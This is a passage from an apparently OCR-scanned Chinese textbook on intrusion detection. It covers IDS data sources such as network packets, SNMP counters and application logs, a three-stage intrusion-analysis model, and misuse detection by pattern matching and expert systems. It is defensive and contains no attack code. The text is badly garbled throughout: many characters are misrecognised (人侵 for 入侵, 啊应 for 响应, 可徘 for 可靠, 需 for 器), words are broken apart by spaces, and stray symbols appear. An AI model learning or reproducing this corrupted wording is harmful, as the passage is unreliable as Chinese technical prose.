由 于 C2 级 安全 审计 是 目前 唯一 能 够 对 信息 系统 中 活动 的 详细 信息 进行 可 徘 收集 的 
机 制 , 它 在 大 多 数 的 入 侵 检 测 系 统 原型 以 及 检测 工具 中 部 作为 主要 的 审计 信息 源 。 一 些 
研究 小 组 建议 制定 一 个 审计 记录 通用 格式 并 定义 必须 包含 在 审计 记录 中 的 信息 。 


272 基于 网 络 数 据 源 


在 当前 商业 入 侵 检 测 产 品 中 ,网 络 传输 是 最 常见 的 数据 源 。 在 基于 网 络 的 入 侵 检 测 
方法 中 ,需要 从 网 络 上 传输 的 网 络 通信 流 中 采集 信息 。 

基于 网 络 的 数据 源流 行 的 主要 原因 是 通过 网 络 监控 获得 信息 的 性 能 代价 低 , 这 是 因 
为 当 数 据 包 通过 网 络 时 ,监控 笑 很 容易 读 取 它们 。 因 此 ,运行 监控 带 不 影响 网 络 上 运行 的 
其 他 系统 的 性 能 。 

基于 网 络 的 数据 源 的 另外 一 个 优点 是 ,在 网 络 上 监控 器 对 用 户 可 以 是 透明 的 ,因此 降 
低 了 攻击 者 无 需 大 量 努 力 就 能 找到 它 并 使 之 无 效 的 可 能 性 。 由 于 监控 系统 需要 的 主要 资 
源 是 存储 空间 ,所 以 完全 可 以 使 用 较 旧 的 、 较 慢 的 系统 对 网 络 进行 监控 。 

此 外 ,网 络 监控 硕 可 以 发 现 基于 主机 系统 来 说 不 容易 发 现 的 某 种 攻击 的 证 据 。 这 些 
攻击 包括 基于 非法 格式 包 和 各 种 拒绝 服务 攻击 的 网 络 攻 击 。 

1 SNMP 信 息 

简单 网 络 管理 协议 (SNMP) 的 管理 信息 库 (MIB) 是 一 个 用 于 网 络 管理 的 信息 库 。 其 
中 存储 有 网 络 配置 信息 (如 路 由 表 .地址 .域名 等 ) 以 及 性 能 / 记 账 数据 (不 同 网 络 接口 和 不 
同 网 络 层 业 务 测量 的 计数 需 ) 。 例 如 ,可 以 利用 SNMP 版 本 1 管理 信息 库 中 的 计数 需 作 
为 基于 行为 的 入侵 检 测 系统 的 输入 信息 。 一 般 在 网 络 接口 层 检查 这 些 计 数 需 ,这 是 因为 
网 络 接口 主要 用 来 区 分 信息 是 发 送 到 网 络 ,还 是 通过 回路 接口 发 送 回 操作 系统 内 部 。 另 
外 ,有 些 人 研究 人 员 在 安全 工具 人 研究 中 考虑 使 用 SNMP 版 本 3 的 相关 信息 。 

网 神 SecIDS 3600 入 侵 检测 系统 的 设备 中 的 管理 对 象 在 SNMP 报 文中 用 管理 变量 
描述 ,为 了 唯一 标识 设备 中 的 管理 对 象 ,SNMP 用 层次 结构 命名 方案 识别 管理 对 象 。 整 
个 层次 结构 就 像 一 棵 树 , 树 的 节点 表示 管理 对 象 。 每 一 个 节点 都 可 以 用 从 根 开 始 的 一 条 
路 径 标识 。 用 户 进入 Web 省 理 页 面 后 ,在 导航 栏 区 域 单 击 “ 管 理 二 系统 设置 ”, 进 入 系统 
设置 页 面 , 单 击 SNMP 页 签 ,可 进入 SNMP 配置 页 面 。SNMP 信息 默认 显示 的 条 目 为 10 
条 ,信息 显示 包括 显示 SNMP 名 称 、 管 理 主 机 IP 地 址 .只 庶 权 限 社 区 名 、 庶 写 权 限 、Trap 
权限 社区 名 和 是 否 局 用 等 信息 。 


2 网 络 通 信和 包 

网 络 唱 探 楷 是 收集 网 络 中 发 生 事件 信息 的 有 效 方法 ,因而 也 第 被 攻击 者 用 来 截取 网 
络 数据 包 , 以 获取 有 用 的 系统 信息 。 目 前 ,多 数 攻击 计算 机 系统 的 行为 是 通过 网 络 进行 
的 。 通 过 监控 ,查看 出 人 系统 的 网 络 数据 包 ,捕获 口令 或 全 部 内 容 。 这 种 方法 是 一 种 有 效 
攻 入 系统 内 部 的 方法 。 几 乎 所 有 拒绝 服务 攻击 都 是 基于 网 络 的 攻击 ,而 且 对 它们 的 检测 
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也 只 能 借助 网 络 ,因为 基于 主机 的 人 侵 检 测 系 统 靠 审 计 系统 不 能 获取 关于 网 络 数据 传输 
的 信息 。 入 侵 检 测 系 统 在 利用 网 络 通信 和 包 作 为 数据 源 时 ,如 果 入 侵 检测 系统 作为 过 滤 路 
由 副 , 生 接 利 用 模式 匹配 ,签名 分 析 或 其 他 方法 对 TCP 或 卫 报 文 的 原始 内 容 进 行 分 析 ， 
那么 分 析 的 速度 就 会 很 快 ,但 如 果 入 侵 检 测 系 统 作 为 一 个 应 用 网 关 分 析 与 应 用 程序 或 所 
用 协议 有 关 的 每 个 数据 报 文 时 ,对 数据 的 分 析 束 会 更 彻底 ,但 开销 很 大 。 将 网 络 通信 包 作 
为 人 侵 检测 系统 的 分 析 数 据 源 ,可 以 解决 以 下 安全 的 相关 问题 。 

(1) 检测 只 能 通过 分 析 网 络 业务 才能 检测 出 的 网 络 攻击 ,如 拒绝 服务 攻击 。 

(2) 不 存在 基于 主机 入 侵 检 测 系统 在 网 络 环境 下 遇 到 的 审计 记录 的 格式 异 构 性 问 
题 。TCP/IP 作为 事实 上 的 网 络 协议 标准 ,使 得 利用 网 路 通信 包 的 人 侵 检 测 系统 不 用 考 
虑 数据 采集 、 分 析 时 数据 格式 的 异 构 性 。 

(3) 由 于 使 用 一 个 单独 的 机 需 进 行 信息 大 采集 ,因而 这 种 数据 收集 .分 析 工 具 不 会 影 
啊 整 个 网 络 的 处 理性 能 。 

(4) 某 些 工具 可 通过 签名 分 析 报 文 的 头 信息 ,检测 针对 主机 的 攻击 。 

但 这 种 方法 也 存在 一 些 典 型 的 弱点 : 

(1) 当 检 测 出 入 侵 时 ,很 难 确定 和信 侵 者 。 因 为 在 报 文 信息 和 发 出 命令 的 用 户 之 间 没 


有 可 徘 的 联系 。 
(2) 加 密 技 术 的 应 用 使 得 不 可 能 对 报 文 载 何 进行 分 析 , 从 而 这 些 检 测 工具 将 会 失去 
大 量 有 用 的 信息 。 


如 果 这 些 工 具 基 于 商用 操作 系统 获取 网 络 信 息 , 由 于 商用 操作 系统 的 堆栈 易于 遭受 
拒绝 服务 攻击 ,所 以 建立 在 其 上 的 入 侵 检测 系统 也 就 不 可 避免 会 遭受 攻击 。 

网 神 SecIDS 3600 入 侵 检测 系统 的 Web 提供 了 日 志 显 示 的 功能 ,可 以 进行 日 志 的 查 
看 和 分 析 , 及 时 发 现 系统 上 所 有 的 行为 活动 ,找到 危害 安全 的 业务 或 动作 。 

日 记 中 心 将 日 忘 按 作 用 分 为 以 下 3 类 。 

(1) Log 类 ,日 志 类 信息 (emerg,alert,critical、error、warning, notification、\informa- 
tional .debugging) 。 

(2) Trap 类 ,告警 类 信息 (warning .notification informational ,debugging) 。 

(3) Debug 类 ,调试 类 信息 。 

志 关 型 依据 业务 来 源 可 分 为 会 话 .访问 控制 列表 、 包 过 小 、 攻 击 防 护 、 路 由 、 流 量 分 

析 、 系 统 诊断 等 几 十 种 ,各 个 业务 都 有 日 号 的 日 志 记 录 ，。 


273 应 用 程序 日 志文 件 


系统 应 用 服务 需 化 的 趋势 ,使 得 应 用 程序 的 日 志文 件 在 人 侵 检 测 系统 的 分 析 数 据 源 
中 具有 相当 重要 的 地 位 。 与 系统 审计 记录 和 网 络 通 信和 包 相 比 ,应 用 程序 的 日 志文 件 具 有 
以 下 3 方面 的 优势 。 

(1) 精确 性 (Accuracy) : 对 于 C2 审计 数据 和 网 络 包 ,它们 必须 经 过 数据 预 处 理 , 才 
能 使 人 侵 检 测 系 统 了 解 应 用 程序 相关 的 信息 。 这 种 处 理 过 程 基于 协议 规范 和 应 用 程序 接 
口 (API) 规 范 的 解释 ,但 是 应 用 程序 开发 者 的 解释 可 能 与 人 侵 检 测 系统 中 的 解释 不 一 致 ， 
从 而 造成 入 侵 检测 系统 对 安全 信息 的 理解 偏差 。 而 下 接 从 应 用 日 志 中 提取 信息 ,就 可 以 
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立 量 你 证 人 侵 检 测 系 统 获 取 安 全 信息 的 准确 性 。 

(2) 完整 性 (Completeness) : 使 用 C2 审计 数据 或 网 络 数据 包 时 ,为 了 重建 应 用 层 
的 会 话 ,需要 对 多 个 审计 进行 调用 或 对 网 络 通信 和 包 进 行 重组 ,特别 是 在 多 主机 系统 中 。 
但 即使 对 于 简单 的 重组 需求 ,也 很 难 达到 要 求 。 例 如 ,通过 匹配 HTTP 请 求 和 啊 应 确 
定 一 个 成 功 的 请 求 ,用 目前 的 工具 很 难 完成 。 而 对 应 用 程序 日 志文 件 来 说 ,即使 应 用 
程序 是 一 个 运行 在 一 组 计算 机 上 的 分 布 系统 ,如 Web 服务 各 数据库 服务 冀 等 , 它 的 日 
志文 件 也 能 包含 所 有 的 相关 信息 。 为 外 ,应 用 程序 还 能 提供 审计 记录 或 网 络 包 中 没有 
的 内 部 数据 信息 。 

(3) 性 能 (Performance) : 通过 应 用 程序 选择 与 安全 相关 的 信息 ,使 得 系统 的 信息 收 
集 机 制 的 开销 远 小 于 安全 审计 记录 的 情况 。 

里 然 使 用 应 用 程序 日 志文 件 有 以 上 优点 ,但 也 有 以 下 一 些 缺 点 。 

(1) 只 有 当 系 统 能 够 正常 瑟 应 用 程序 日 志文 件 时 ,才能 够 检测 出 针对 系统 的 攻击 行 
为 。 如 来 对 系统 的 攻击 使 系统 不 能 记录 应 用 程序 的 日 志 ( 在 许多 拒绝 服务 攻击 中 虱 会 出 
现 这 种 情况 ) ,那么 人 侵 检 测 系统 将 得 不 到 检测 需要 的 信息 。 

(2) 许多 人 侵 攻 击 只 是 针对 系统 软件 确 层 协议 中 的 安全 漏洞 ,如 网 络 驱动 程序 .IP 协 
议 等 。 而 这 些 攻 击 行为 不 利用 应 用 程序 代码 ,所 以 它们 受 攻击 的 情况 在 应 用 程序 的 日 志 
中 看 不 出 来 ,唯一 能 够 看 到 的 是 攻击 绪 示 ,如 系统 和 被 重新 局 动 。 

IBM 公司 的 WebWatcher 是 一 个 典型 的 利用 应 用 程序 日 志文 件 的 入 侵 检 测 工具 , 它 
通过 实时 地 对 Web 服务 希 的 日 六 进行 监控 获取 大 量 针对 服务 天 攻击 的 详细 信息 ,并 据 此 
进行 检测 。 同 样 ,可 以 设计 监控 数据 库 服务 冀 的 入 侵 检 测 工具 ， 

274 其 他 入 侵 检 测 系统 的 报警 信息 

随 着 网 络 技术 和 分 布 式 系统 的 发 展 ,入 侵 检测 系统 也 从 针对 主机 系统 转向 针对 网 络 、 
分 布 式 系统 。 基 于 网 络 .分 布 式 环境 的 检测 系统 为 了 上 履 兰 较 大 的 范围 ,一 般 采 用 分 层 的 绪 
构 , 由 许多 局 部 的 入 侵 检测 系统 (如 传统 的 基于 主机 的 入 侵 检测 系统 ) 进 行 局 部 检测 ,然后 
把 局 部 检测 结 来 汇报 给 上 层 检 测 系统 ,而 且 各 局 部 入 侵 检 测 系 统 也 可 以 其 他 局 部 入 侵 检 
测 系统 的 绪 采 作为 参考 ,弥补 不 同 检测 机 制 的 人 侵 检 测 系 统 的 不 足 。 因 此 ,其 他 人 侵 检 测 
系统 的 报警 信息 也 是 人 侵 检 测 系 统 的 重要 数据 来 源 。 

275 其 他 设备 


目前 的 很 多 网 络 设备 ,如 交换 机 、 路 由 硕 、 网 络 管理 系统 等 ,都 具有 比较 完善 的 日 志 信 


县 ,这些 信 和 息 提 供 了 关于 设备 的 性 能 、 使 用 统计 资料 等 信息 ,这 些 信 息 在 决定 一 个 已 探测 
出 的 问题 是 与 安全 相关 的 ,还 是 与 系统 其 他 方面 原因 相关 时 ,具有 较 大 的 用 处 。 


此 外 ,目前 的 很 多 安全 产品 ,如 防火 墙 .安全 扫描 系统 ,访问 控制 系统 等 ,都 能 够 产 
出 它们 自身 的 活动 日 志 。 这 些 日 志 包含 安全 相关 的 信息 ,也 可 作为 人 侵 检测 系统 的 信 


| 
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281 入 侵 分 析 的 概念 


1 入 侵 分 析 的 定义 

对 计算 机 网 络 或 计算 机 系统 中 的 若干 关键 点 收集 信息 并 进行 分 析 , 从 中 发 现 网 络 或 
系统 中 是 否 有 违反 安全 策略 的 行为 和 被 攻击 的 迹象 。 入 侵 分 析 可 以 实时 进行 ,也 可 以 事 
后 进行 ， 


2 入 侵 分 析 的 目的 

入 侵 分 析 的 主要 目的 是 提高 信息 系统 的 安全 性 。 除 了 检测 入 侵 行为 外 ,人 们 通常 还 
希望 达到 以 下 目标 。 

1) 重要 的 威慑 力 

目标 系统 使 用 IDS 进行 人 侵 分 析 , 对 于 和 人 侵 者 来 说 ,具有 很 大 的 威慑 力 , 因 为 这 意味 
着 攻击 行为 可 能 被 发 现 或 被 追踪 。 

2) 安全 规划 和 管理 

在 分 析 过 程 中 可 能 发 现 系 统 安 全 规划 和 管理 中 存在 的 漏洞 ,安全 管理 员 可 以 根据 分 
析 结 果 对 系统 进行 重新 配置 ,避免 被 攻击 者 用 来 窃取 信息 或 破坏 系统 。 

3) 获取 入 侵 证 据 

人 和信 侵 分 析 可 以 提供 有 关 入 侵 行 为 详细 、 可 信 的 证 据 , 这 些 证 据 可 用 于 事后 追究 入 侵 者 


J 贡 任 。 


3 入 侵 分 析 的 注意 事项 

上 面 列 出 了 入 侵 分 析 的 处 理 日 标 , 下 面 考虑 每 个 目标 如 何 驱 使 入侵 检测 系统 的 功能 
需求 , 即 进行 人 侵 分 析 的 过 程 中 需要 考虑 的 注意 事项 。 具 体 可 分 为 4 个 方面 。 

1) 需求 

入 侵 检测 系统 支持 两 个 基本 需求 : 一 个 是 可 说 明 性 , 它 是 指 一 个 活动 与 人 或 负责 它 
的 实体 的 能 力 。 可 说 明 性 要 求 能 够 一 臻 地、 可靠 地 识别 和 鉴别 系统 中 的 每 个 用 户 。 更 进 
一 步 , 也 必须 能 够 可 徘 地 联系 用 户 及 其 活动 的 审计 记录 或 其 他 事件 记录 。 

在 商业 环境 中 ,可 说 明 性 的 概念 是 简单 且 易 理解 的 ,但 它们 在 网 络 中 的 实现 却 相 当 困 难 。 
在 网 络 中 ,一 个 用 户 在 不 同 的 系统 中 可 能 会 有 不 同 的 号 份 。 就 用 户 本 地 号 份 而 言 , 主 机 级 审计 
跟 踊 有 反映 了 用 户 的 活动 ,但 是 在 网 络 中 , 跟 踊 用 户 活 动 中 的 号 份 需 要 进行 额外 的 处 理 。 

对 入 侵 检测 系统 的 第 二 个 需求 是 实时 检测 和 啊 应 。 需 求 包括 快速 识别 与 攻击 相关 的 
事件 链 , 然 后 阻 断 攻 击 或 隐蔽 系统 ,避免 攻击 者 的 影响 。 例 如 ,通过 跟踪 者 发 出 的 命令 ,可 
以 将 任何 被 更 改 的 文件 或 目标 恢复 到 攻击 前 的 状态 。 

2) 子 目 标 

分 析 也 有 和子 目标 。 例 如 ,用户 可 能 需要 在 表格 中 体 留 信息 ,用 于 文 持 对 系统 和 网 络 影 
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啊 程 度 分 析 。 也 可 能 是 你 留 一 些 系统 执 行 的 情况 或 识别 影响 性 能 的 问题 ,还 可 能 会 包括 
归档 和 保护 时 间 日 志 的 完整 性 等 。 

3) 目标 划分 

在 目标 和 要 求 被 计算 之 后 ,它们 应 该 按照 优先 顺序 区 分 。 按 优先 顺序 区 分 在 决定 子 
系统 的 结构 方面 是 必需 的 。 优 移 权 可 以 按 进度 表 划 分 ,也 可 以 按 系统 划分 。 例 如 ,系统 X 
相关 的 所 有 需求 比 其 他 系统 需求 的 优先 权 局 。 当 然 , 优 先 权 也 可 以 按照 其 他 属性 划分 。 

4) 平衡 

有 时 ,系统 的 需求 可 能 和 目标 有 冲突 。 例 如 ,一 个 分 析 目 标 可 能 是 将 分 析 对 目标 系统 
的 性 能 和 资源 消耗 的 影响 降 到 最 低 。 然 而 ,为 了 法 律 上 的 需求 ,可 能 要 保存 日 志 , 这 两 个 
目标 就 相互 冲突 ,因此 需要 进行 适当 的 平衡 。 


282 入 侵 分 析 模 型 


分 析 是 入 侵 检 测 的 核心 功能 , 它 可 以 简单 。 例 如 ,根据 日 志 建 立 决 策 表 也 可 以 很 复 
杂 , 如 集成 数 百 万 个 处 理 的 非 参数 统计 量 。 

下 面 介 绍 一 个 人 侵 检测 系统 分 析 处 理 的 过 程 , 定 义 一 个 包含 能 在 系统 事件 日 志 中 找 
到 入 侵 证 据 的 所 有 方法 的 模型 。 把 人 侵 分 析 过 程 分 为 3 个 阶段 : 构建 分 析 需 、 分 析 数 据 
以 及 反馈 和 更 新 。 


1 构建 分 析 情 

在 分 析 模 型 中 ,第 一 阶段 的 任务 就 是 构造 分 析 引 擎 。 分 析 引 擎 执行 预 处 理 、 分 类 和 后 
处 理 的 核心 功能 。 不 考虑 分 析 方 法 ,如 果 引 擎 能 够 正常 运行 , 它 必 须 能 够 与 其 操作 环境 配 
合 , 即 使 在 独立 作为 系统 的 一 部 分 被 执行 的 基本 系统 中 ,这 个 阶段 也 是 必需 的 。 

1) 收集 并 生成 事件 信息 

构造 分 析 器 的 第 一 步 是 收集 事件 信息 。 这 一 阶段 可 能 收集 一 个 系统 产生 的 事件 信 
息 , 也 可 能 收集 实验 室 环境 下 的 时 间 信 息 , 具 体 依赖 分 析 方 法 。 在 有 些 情况 下 ,根据 一 套 
正式 的 规范 工作 的 开发 人 员 可 能 会 人 工 收集 这 些 事件 信息 。 

对 于 误 用 检测 的 处 理 包括 收集 入 侵 信 息 , 其 中 有 脆弱 性 、 攻 击 和 威胁 ,具体 攻击 工具 
和 观察 到 的 重要 信息 。 在 这 种 情况 下 , 误 用 检测 也 收集 典型 的 一 致 策略 .过 程 和 活动 
信息 。 

对 于 异常 检测 ,其 事件 信息 来 自 系 统 本 身 或 指定 的 相似 系统 ,因此 信息 是 建立 指示 正 
常用 户 行 为 的 基准 特征 轮廓 所 必需 的 。 

2) 预 处 理 信息 

收集 事件 信息 完成 后 ,这 些 信息 需要 经 过 许多 转换 ,以 备 分 析 引 擎 使 用 。 它 们 可 能 被 
修改 成 通用 的 或 规范 的 格式 。 这 种 格式 通常 作为 分 析 需 的 一 部 分 。 在 一 些 系 统 中 ,数据 
也 可 能 被 进行 结构 化 处 理 , 以 便 执 行 一 些 特性 选择 或 执行 其 他 一 些 处 理 。 

在 误 用 检测 中 ,数据 预 处 理 通常 包括 转换 收集 在 某 种 通常 表格 中 的 事件 信息 。 例 如 ， 
攻击 症状 和 策略 冲突 可 能 被 转换 成 基于 状态 转换 的 信号 或 某 种 产品 系统 规则 。 在 一 个 基 
于 网 络 的 入 侵 检测 系统 中 ,数据 包 可 能 首先 被 缓存 起 来 ,并 在 TCP 会 话 期 重建 。 
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在 寞 第 检测 中 ,事件 数据 可 能 锌 转换 成 数据 表 , 其 中 一 些 种 类 的 数据 转换 成 数据 表 ， 
如 系统 名 转换 成 卫 地 址 。 同 样 ,不 同 的 信息 也 可 能 会 锌 转换 成 一 些 规范 的 表格 。 

规范 表格 开始 用 于 单个 引擎 监视 多 个 操作 系统 。 每 个 操作 系统 都 有 其 事件 数据 的 本 
地 格式 。 于 是 ,入 侵 检 测 开 发 者 们 可 以 开发 一 个 可 分 析 来 日 不 同 操作 系统 数据 的 通用 分 
析 引 车。 开发 者 可 集中 将 新 操作 系统 的 事件 数据 转换 成 规范 格式 。 规 犯 格式 同样 也 适用 
于 在 一 种 操作 系统 环境 下 进行 一 般 分 析 。 有 些 人 侵 检 测 专家 认为 : 许多 企业 已 完全 集中 
于 一 般 销 用 的 操作 系统 ,以 至 于 规范 式 也 不 再 使 用 。 

3) 建立 行为 分 析 引 擎 

建立 行为 分 析 引 擎 就 是 按 设计 原则 建立 一 个 数据 区 分 需 , 该 区 分 喜 应 该 能 够 把 人 侵 
指示 数据 和 非 人 侵 指示 数据 区 分 开 。 该 分 析 引 擎 的 建立 依赖 于 分 析 方 法 。 

在 误 用 检测 中 ,数据 区 分 引擎 是 建立 在 规则 或 其 他 模式 描绘 的 行为 上 的 。 这 些 规则 
或 描述 禹 能 分 成 单一 特征 或 复合 特征 。 例 如 ,检查 到 一 个 坏 格 式 的 IP 包 属 于 单一 特征 ， 
而 检测 到 一 个 在 UNIX 系统 下 发 送 E-mail 的 攻击 就 属于 复合 特征 。 

一 个 误 用 检查 区 分 引擎 的 结构 可 以 是 一 个 专家 系统 。 专 家 系统 由 一 个 知识 库 构成 ， 
若 识 库 包 括 基于 过 去 入 侵 可 疑 行为 的 规则 ,这 些 规则 通 沼 采用 if-then-else 结构 。 

误 用 检查 区 分 引擎 的 结构 也 可 以 是 模式 引擎 , 它 把 入 侵 行为 作为 攻击 匹配 特征 去 匹 
配 审 计数 据 。 由 于 建立 在 这 个 模型 上 的 许多 系统 是 十 分 可 靠 有效 的 ,因此 ,目前 商业 入 
侵 检测 产品 大 多 采用 这 种 方法 。 

在 异常 检测 中 ,区 分 模型 通常 由 用 户 过 去 行为 的 统计 特征 轮廓 构成 ,这 些 特征 轮廓 也 
用 于 标识 系统 处 理 的 行为 ,这 些 统计 特征 轮廓 按照 各 种 算法 进行 计算 ,在 用 户 行 为 模式 下 
其 使 用 方案 可 能 会 逐渐 变化 。 这 个 特征 轮廓 可 以 按照 固定 或 可 变 的 进度 表 进 行 修补 。 

4) 将 事件 数据 输入 引擎 中 

行为 分 析 引 擎 建 好 后 ,就 需要 将 预 处 理 过 的 事件 输入 到 引擎 中 。 

误 用 检测 用 于 预 处 理事 件数 据 或 攻击 知识 的 内 容 , 将 收集 到 的 对 分 析 引 擎 有 丰 遇 和 意 
义 的 攻击 数据 输入 到 误 用 检测 中 。 

第 检测 通过 运行 寞 妾 检 测 各 ,将 收集 到 的 数据 输入 其 中 ,并 允许 系统 基于 这 些 数 据 
计算 用 户 轮廓 ,由 于 输入 到 异 第 检测 副 的 历史 数据 对 于 入 侵 来 说 是 不 够 的 ,通常 假定 没有 
任何 协作 证 据 , 因 此 为 异常 检测 副 寻 找 合适 的 参考 事件 数据 是 非常 重 要 的 。 

5) 保存 已 输入 数据 模型 

无 论 采 用 什么 方法 ,输入 数据 模型 都 应 该 锌 存储 到 预定 的 位 置 ,如 保存 在 知识 库 中 ， 
以 备 操作 使 用 。 在 这 种 意义 上 ,输入 数据 的 模型 包含 了 所 有 的 分 析 标准 ,事实 上 也 包含 了 
分 析 引 擎 的 实际 核心 ， 


2 分析 数据 
在 对 实际 现场 数据 分 析 阶 段 ,分 析 此 需要 分 析 现 场 实际 数据 ,识别 入 侵 和 其 他 重要 
a 


1) 输入 事件 记录 
执行 分 析 的 第 一 步 是 收集 信息 源 产生 的 事件 记录 ,这 样 的 信 自 源 可 能 是 网 络 数 据 包 、 
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操作 系统 的 审计 记录 或 应 用 日 志文 件 , 并 且 这 些 信息 源 都 必须 是 可 靠 的 。 

2) 事件 预 处 理 

与 构造 分 析 天 一样 ,可 能 需要 一 些 事件 数据 的 预 处 理 。 预 处 理 的 确切 性 质 依 徘 分 析 
的 性 质 。 例 如 ,从 高 级 会 话 中 抽出 各 种 TCP 消息 ,并 且 把 来 自 操作 系统 的 过 程 标识 符 构 
造成 一 个 高 度 集成 的 处 理 树 。 

对 于 误 用 检测 ,事件 数据 通常 都 转化 成 典型 的 表格 ,表格 对 应 于 攻击 信和 号 的 结构 。 在 
一 些 方法 中 ,事件 数据 被 集成 起 来 。 例 如 ,用 户 会 话 期 \ 网 络 连 接 或 其 他 高 级 事件 构成 一 
些 重要 的 微 时 间 片 段 。 在 其 他 方法 中 ,可 能 会 通过 捆绑 一 些 属 性 、 完 全 删除 其 他 属性 和 在 
其 他 数据 上 进行 计算 生成 新 的 、 条 理 紧 凑 的 数据 记录 精简 数据 。 

在 异常 检测 中 ,事件 数据 通常 被 精简 成 一 个 轮廓 问 量 ,行为 属性 用 标识 表示 。 

3) 比较 事件 记录 和 知识 库 

对 格式 化 的 事件 记录 和 知识 库 的 内 容 进行 比较 。 接 下 来 的 处 理 取 决 于 比较 结果 和 对 
分 析 方 案 的 质疑 。 如 果 记 录 指 示 一 次 入 侵 , 那 么 就 可 以 记 和 日志。 如 果 记 录 没 有 指示 ,分 
析 需 就 简单 地 接受 下 一 个 记录 。 

在 误 用 检测 中 , 预 处 理事 件 记录 被 提交 给 一 个 模式 匹配 引擎 。 如 果 模 式 匹 配 带 在 
攻击 信号 和 事件 记录 中 找到 一 个 匹配 , 则 返回 一 个 警告 。 在 一 些 误 用 检测 需 中 ,如 果 
找到 一 个 部 分 匹配 , 则 可 能 被 记录 或 缓存 在 内 存 中 ,等 待 进一步 的 信息 ,以 便 作 出 更 明 
确 的 决定 。 

在 异常 检测 中 , 比较 用 户 会 话 行 为 轮廓 内 容 与 其 历史 轮廓 , 依 徘 分 析 方案 判定 。 如 有 果 
用 户 行为 与 历史 行为 是 足够 相关 的 , 则 指示 不 是 一 次 攻击 。 如 果 判 断 用 户 行为 是 异常 的 ， 
就 返回 一 个 警告 。 许 多 基于 异常 检测 的 入 侵 检测 引擎 可 能 也 同时 执行 误 用 检测 ,所 以 在 
不 同方 案 中 ,它们 可 以 相互 组 合 。 

4) 产生 啊 应 

如 果 事 件 记 录 是 相应 于 入 侵 或 其 他 重要 行为 的 , 则 需要 返回 一 个 啊 应 。 啊 应 的 性 质 
依靠 具体 分 析 方 法 的 性 质 。 啊 应 可 以 是 一 个 警报 .日志 条 目 , 或 是 被 入 侵 检 测 系统 管理 员 
指定 的 一 些 其 他 行为 。 


3 反馈 和 更 新 

反馈 和 更 新 是 一 个 非常 重要 的 过 程 。 在 误 用 检测 系统 中 ,反映 这 个 阶段 的 主要 功能 
是 攻击 信息 的 特征 数据 库 是 否 可 以 更 新 。 每 天 都 能 够 根据 新 攻击 方式 的 出 现 更 新 攻击 信 
明 的 特征 数据 库 是 非常 重要 的 。 许 多 优化 的 信号 引擎 能 够 在 系统 正在 监控 事件 数据 , 没 
有 中 断 分 析 过 程 的 同时 ,由 系统 操作 员 更 新 信号 数据 库 。 

大 多 数 的 基于 误 用 检测 分 析 方 案 都 有 一 些 关 于 最 大 时 间 间 隔 的 主张 ,以 便 在 这 段 时 
间 内 匹配 一 次 攻击 事件 。 

在 每 个 事件 中 ,因为 保存 状态 信息 需要 一 个 大 容量 的 内 存 , 尤 其 是 在 比较 忙 的 系统 
上 ,有 多 个 用 户 .进程 和 网 络 连接 时 ,状态 信息 的 积极 管理 是 系统 稳定 的 关键 。 在 基于 网 
络 的 入 侵 检测 系统 中 能 够 看 到 这 方面 的 影 啊 。 

在 异常 检测 系统 中 ,依靠 执行 异常 检测 的 类 型 定时 更 新 历史 统计 特征 轮廓 。 例 如 ,在 
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和 人 侵 检 测 系统 (IDS) 中 ,每 天 都 进行 特征 轮廓 的 更 新 。 每 个 用 户 的 摘要 资料 被 加 入 知识 
库 中 ,并 且 删 除 最 旧 的 资料 。 

对 于 其 余 的 统计 资料 ,可 以 给 它们 乘 以 一 个 老化 因子 。 通 过 这 种 方法 ,最 近 的 行为 能 
够 有 效 地 影 啊 正 第 活动 的 决策 。 


283 入侵 检测 的 分 析 方 法 


入 侵 检测 的 分 析 方 法 主要 包括 误 用 检测 .异常 检测 .基于 状态 的 协议 分 析 技 术 和 其 他 
检测 方法 。 本 节 将 对 这 些 方法 进行 具体 介绍 。 


lL 误 用 检测 

误 用 检测 对 于 系统 事件 提出 的 问题 是 ; 这 个 活动 是 恶意 的 吗 ? 误 用 检测 涉及 对 入 侵 
指示 上 需 已 知 的 具体 行为 的 描述 信息 ,然后 为 这 些 指示 需 过 滤 事 件数 据 。 

误 用 入 侵 检测 根据 已 知 的 入 侵 模式 检测 人 侵 。 入 侵 者 常常 利用 系统 和 应 用 软件 中 的 
昱 点 实施 攻击 。 而 这 些 弱 点 易 编 码 成 某 种 模式 。 如 果 
入 侵 者 的 攻击 方式 正好 匹配 上 检测 系统 中 的 模式 库 , 则 
认为 人 侵 发 生 。 误 用 入 侵 检测 模型 如 图 2-9 所 示 。 

显然 ,要 想 执行 误 用 检测 ,需要 有 一 个 对 误 用 行为 
构成 的 民 好 理解 。 误 用 入 侵 检测 依赖 于 模式 库 ,如果 没 
有 构造 好 模式 库 , 则 IDS 就 不 能 检测 到 入 侵 行 为 。 例 
如 ,Internet 蠕虫 攻击 使 用 了 fingered 和 Sendmail 错 
误 , 可 以 使 用 误 用 检测 。 

误 用 入 侵 检测 的 主要 假设 是 具有 能 够 精确 按 某 种 
方式 编码 的 攻击 。 通 过 捕获 攻击 及 重新 整理 ,可 确认 入 图 2-9 误 用 入侵 检测 模型 
侵 活 动 是 基于 同一 弱点 进行 攻击 的 入侵 方式 的 变种 。 
理论 上 讲 , 以 某 种 编码 能 够 有 效 捕获 独特 的 人 侵 不 都 是 可 行 的 。 某 些 模式 的 估算 具有 国 
定 的 不 准确 性 ,这样 就 会 造成 IDS 的 误 警 报 和 漏 警 报 。 误 用 入侵 检测 的 主要 局 限 性 是 适 
用 于 已 知 使 用 模式 的 可 徘 检 测 ,但 仅 能 检测 到 已 知 的 入侵 方式 。 

1) 模式 匹配 方法 

基于 模式 匹配 的 误 用 入 侵 检 测 方 法 是 最 基本 的 误 用 检测 分 析 方 法 ,该 方法 将 已 知 的 
入 侵 特征 转化 成 模式 ,存放 于 模式 数据 库 中 。 在 检测 过 程 中 ,模式 匹配 模型 将 发 生 的 事件 
与 人 侵 模 式 库 中 的 入侵 模式 进行 匹配 ,如 果 匹 配 成 功 , 则 认为 有 入 侵 行 为 发 生 ， 

2) 专家 系统 方法 

基于 专家 系统 的 误 用 入 侵 检测 方法 是 最 传统 、 最 常用 的 误 用 人 人 侵 检测 方法 。 诸 如 
MIDAS IDES 下 一 代 IDES(NIDES) .DIDS 和 CMDS 中 都 使 用 了 这 种 方法 。 在 MIDAS、 
IDES 和 NIDES 中 ,应 用 的 产品 系统 是 PBEST, 该 产品 由 Alan Whithurst 设计 。 而 DIDS 和 
CMDS 使 用 的 是 CLIPS, 它 是 由 美国 国家 航空 和 宇航 局 开发 的 系统 。 

入 侵 检测 专家 系统 的 缺点 主要 如 下 。 

